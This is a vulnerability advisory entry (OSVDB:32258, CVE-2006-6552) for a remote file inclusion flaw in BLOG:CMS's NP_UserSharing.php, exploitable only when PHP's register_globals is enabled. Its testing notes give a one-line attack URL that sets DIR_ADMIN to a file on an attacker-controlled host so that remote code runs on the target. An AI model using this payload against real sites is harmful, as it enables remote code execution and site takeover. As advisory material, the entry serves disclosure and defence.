BLOG:CMS admin/plugins/NP_UserSharing.php DIR_ADMIN Variable Remote File Inclusion

2006-12-12T09:33:36
ID OSVDB:32258
Type osvdb
Reporter OSVDB
Modified 2006-12-12T09:33:36

Description

Technical Description

This vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).

Manual Testing Notes

http://[target]/Blog_CMS/admin/plugins/NP_UserSharing.php?DIR_ADMIN=http://[attacker]/tools/cmd.txt?admin

References:

Security Tracker: 1017375 Secunia Advisory ID:23345 Other Advisory URL: http://www.milw0rm.com/exploits/2923 Mail List Post: http://marc.theaimsgroup.com/?l=bugtraq&m=116595444801459&w=2 ISS X-Force ID: 30854 FrSIRT Advisory: ADV-2006-4984 CVE-2006-6552